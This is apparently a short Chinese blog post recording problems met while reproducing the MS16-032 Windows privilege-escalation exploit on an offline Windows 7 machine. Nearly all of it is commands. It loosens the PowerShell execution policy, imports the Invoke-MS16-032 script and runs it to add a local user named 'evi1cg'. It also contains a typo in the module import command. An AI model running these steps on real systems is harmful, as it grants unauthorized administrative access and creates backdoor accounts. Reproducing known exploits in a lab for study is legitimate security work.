关于ms16-032复现在win7的一些坑(不联网环境下)

1.得先允许执行脚本

set-ExecutionPolicy RemoteSigned

要不然是不允许执行.ps1脚本的

2.powershell import

由于没联网,所以我把github上面的invoke_ms16-032.ps1下载下来了。

先用powershell 命令进入powershell命令行。

然后得先执行

import-moudle .\invoke_ms-032.ps1

然后在执行命令,添加用户

Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'

 

你可能感兴趣的:(网络安全,ms16-032,windows提权)